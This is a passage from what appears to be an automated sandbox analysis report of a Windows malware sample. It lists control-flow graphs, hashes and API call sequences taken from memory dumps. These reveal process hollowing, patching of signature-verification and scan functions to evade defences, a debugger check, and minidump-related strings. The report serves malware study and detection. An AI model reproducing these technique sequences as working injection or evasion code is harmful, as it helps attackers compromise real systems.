                                                                                                                                              • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                              • API String ID: 1022112746-51457883
                                                                                                                                              • Opcode ID: b9a7d30440635ea959f75d1b7b86a50d7a3f77158cdfa88b6088c9f398d95038
                                                                                                                                              • Instruction ID: 3e5532080da9365b80b9d91f2c93d282f65584834caa51f57a13dee9c88713d7
                                                                                                                                              • Opcode Fuzzy Hash: b9a7d30440635ea959f75d1b7b86a50d7a3f77158cdfa88b6088c9f398d95038
                                                                                                                                              • Instruction Fuzzy Hash: CFE20F75A501199BDB12FB74CDB9BCE73FABF49310F2180A9E049AB214DB309E468F51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 7653 27d8bae-27d8bb3 7655 27d8bb8-27d8bbd 7653->7655 7655->7655 7656 27d8bbf-27d8ca6 call 27c493c call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7655->7656 7687 27d8cac-27d8d87 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7656->7687 7688 27da6f7-27da761 call 27c44d0 * 2 call 27c4c0c call 27c44d0 call 27c44ac call 27c44d0 * 2 7656->7688 7687->7688 7732 27d8d8d-27d90b5 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c30d4 * 2 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4d8c call 27c4d9c call 27d85dc 7687->7732 7841 27d9128-27d9449 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c2ee0 call 27c2f08 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 GetThreadContext 7732->7841 7842 27d90b7-27d9123 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7732->7842 7841->7688 7950 27d944f-27d96b2 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d8254 7841->7950 7842->7841 8023 27d99bf-27d9a2b call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 7950->8023 8024 27d96b8-27d9821 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d84c4 7950->8024 8051 27d9a30-27d9bb0 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d79b4 8023->8051 8114 27d984b-27d98b7 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 8024->8114 8115 27d9823-27d9849 call 27d79b4 8024->8115 8051->7688 8155 27d9bb6-27d9caf call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d8ac0 8051->8155 8124 27d98bc-27d99bd call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d79b4 8114->8124 8115->8124 8124->8051 8206 27d9cb1-27d9cfe call 27d89b8 call 27d89ac 8155->8206 8207 27d9d03-27da6f2 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d7d00 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d7d00 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 SetThreadContext NtResumeThread call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c2c2c call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d87a0 * 3 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d87a0 * 2 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 * 5 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27c480c call 27c494c call 27c4798 call 27c494c call 27d87a0 call 27d7ed4 call 27d87a0 * 2 8155->8207 8206->8207 8207->7688
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
                                                                                                                                                • Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB
                                                                                                                                                • Part of subcall function 027D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668
                                                                                                                                              • GetThreadContext.KERNEL32(00000614,02821420,ScanString,028213A4,027DA77C,UacInitialize,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,UacInitialize,028213A4), ref: 027D9442
                                                                                                                                                • Part of subcall function 027D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5
                                                                                                                                                • Part of subcall function 027D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529
                                                                                                                                                • Part of subcall function 027D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                              • API String ID: 4113022151-51457883
                                                                                                                                              • Opcode ID: 82de45d4741441ef4b3ec3e50d28e787a54382e262fc1d34fa0405a19234bc59
                                                                                                                                              • Instruction ID: 890cbf7e4d3f7fe3ccecaedfe3372a73616c65c154e854b6e2456fe4aefebd5a
                                                                                                                                              • Opcode Fuzzy Hash: 82de45d4741441ef4b3ec3e50d28e787a54382e262fc1d34fa0405a19234bc59
                                                                                                                                              • Instruction Fuzzy Hash: F9E20F75A501199BDB12FB74CDB9BCE73FABF49310F2180A9E049AB214DB309E468F51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8510 27c5a78-27c5ab9 GetModuleFileNameA RegOpenKeyExA 8511 27c5afb-27c5b3e call 27c58b4 RegQueryValueExA 8510->8511 8512 27c5abb-27c5ad7 RegOpenKeyExA 8510->8512 8517 27c5b40-27c5b5c RegQueryValueExA 8511->8517 8518 27c5b62-27c5b7c RegCloseKey 8511->8518 8512->8511 8513 27c5ad9-27c5af5 RegOpenKeyExA 8512->8513 8513->8511 8515 27c5b84-27c5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8515 8519 27c5c9e-27c5ca5 8515->8519 8520 27c5bbb-27c5bbf 8515->8520 8517->8518 8521 27c5b5e 8517->8521 8523 27c5bcb-27c5be1 lstrlenA 8520->8523 8524 27c5bc1-27c5bc5 8520->8524 8521->8518 8525 27c5be4-27c5be7 8523->8525 8524->8519 8524->8523 8526 27c5be9-27c5bf1 8525->8526 8527 27c5bf3-27c5bfb 8525->8527 8526->8527 8528 27c5be3 8526->8528 8527->8519 8529 27c5c01-27c5c06 8527->8529 8528->8525 8530 27c5c08-27c5c2e lstrcpynA LoadLibraryExA 8529->8530 8531 27c5c30-27c5c32 8529->8531 8530->8531 8531->8519 8532 27c5c34-27c5c38 8531->8532 8532->8519 8533 27c5c3a-27c5c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 27c5c6c-27c5c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,027C0000,027ED790), ref: 027C5A94
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AB2
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AD0
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027C5AEE
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027C5B37
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,027C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001), ref: 027C5B55
                                                                                                                                              • RegCloseKey.ADVAPI32(?,027C5B84,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027C5B77
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027C5B94
                                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027C5BA1
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027C5BA7
                                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027C5BD2
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C19
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C29
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027C5C51
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027C5C61
                                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027C5C87
                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027C5C97
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                              • API String ID: 1759228003-2375825460
                                                                                                                                              • Opcode ID: 6561acb95f4e5a0512e4a2c31c50434ca66fdec8d089b8c6b7f1f2b25ea40dd1
                                                                                                                                              • Instruction ID: 993b665b439d4eedb0845ad93ce8f79dd178b80dd279e03f39b4eeb830ce0e1d
                                                                                                                                              • Opcode Fuzzy Hash: 6561acb95f4e5a0512e4a2c31c50434ca66fdec8d089b8c6b7f1f2b25ea40dd1
                                                                                                                                              • Instruction Fuzzy Hash: 66518775A4020D7EFB21DAB4CC46FEFBBAD9B04744FA001ADA604F6181E775EA448F64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 10523 27d87a0-27d87c5 LoadLibraryW 10524 27d880f-27d8815 10523->10524 10525 27d87c7-27d87df GetProcAddress 10523->10525 10526 27d8804-27d880a FreeLibrary 10525->10526 10527 27d87e1-27d8800 call 27d7d00 10525->10527 10526->10524 10527->10526 10530 27d8802 10527->10530 10530->10526
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A
                                                                                                                                                • Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                                              • Opcode ID: 808cef7e4cc1b356ec8d2a4716a318e964bc1eb001b98b3e4063da25c99017cd
                                                                                                                                              • Instruction ID: 2941d52d1fb84aac652bcdc1c6b409f6ffb4de0ae7f8e085afeba7ef4e25575c
                                                                                                                                              • Opcode Fuzzy Hash: 808cef7e4cc1b356ec8d2a4716a318e964bc1eb001b98b3e4063da25c99017cd
                                                                                                                                              • Instruction Fuzzy Hash: 08F0C879EC12145EEB20AB68AB4DF7633EE9380355F3A483DB11C976C2C77C04588B50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 10540 27debf0-27dec0a GetModuleHandleW 10541 27dec0c-27dec1e GetProcAddress 10540->10541 10542 27dec36-27dec3e 10540->10542 10541->10542 10543 27dec20-27dec30 CheckRemoteDebuggerPresent 10541->10543 10543->10542 10544 27dec32 10543->10544 10544->10542
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 027DEC00
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027DEC12
                                                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027DEC29
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                              • API String ID: 35162468-539270669
                                                                                                                                              • Opcode ID: 31665a4f4f9e1ecb3edb2391ae248bcea48bdaf7e7be285cddad83e24b68851c
                                                                                                                                              • Instruction ID: 5a0d2ae169b805241a6908ec92c08060f9febd7a5cb8ba4d2733aa9f09014177
                                                                                                                                              • Opcode Fuzzy Hash: 31665a4f4f9e1ecb3edb2391ae248bcea48bdaf7e7be285cddad83e24b68851c
                                                                                                                                              • Instruction Fuzzy Hash: 02F0A0B090524CABEB23E7B8888D7ECFBB95B05328FA40798E428761C1E77506848651

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA
                                                                                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDBEB
                                                                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDC1B
                                                                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027DDC30
                                                                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027DDC5C
                                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027DDC65
                                                                                                                                                • Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2659941336-0
                                                                                                                                              • Opcode ID: 5995310fb84b220f51548f9d6139c584a5ec827070fd7aa2518d43d097f09221
                                                                                                                                              • Instruction ID: f4a55e262d583f22ad6674d6c33ee8392bafc6096e05108ca52cb1f877f7ddab
                                                                                                                                              • Opcode Fuzzy Hash: 5995310fb84b220f51548f9d6139c584a5ec827070fd7aa2518d43d097f09221
                                                                                                                                              • Instruction Fuzzy Hash: 4621D372A503087AEB11EBE4CC5AFDEB7BDAF48B00F500465B600F71C0DAB4AA058B65

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027DE436
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                                              • Opcode ID: 669f4598bca4adf8dd4e8b3b6637e43364a459319f688a10745ff92dc8ae7b6f
                                                                                                                                              • Instruction ID: 31727cc5df6e607e87e66a716e7c556e86ad588a4541a1b6d1e86f2f543bd3ee
                                                                                                                                              • Opcode Fuzzy Hash: 669f4598bca4adf8dd4e8b3b6637e43364a459319f688a10745ff92dc8ae7b6f
                                                                                                                                              • Instruction Fuzzy Hash: 8C41FC71A501189BEB12FBB4CDA5E9EB7FAEF8C310F21443DE041AB244DA74AD018F60

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA
                                                                                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
                                                                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
                                                                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
                                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
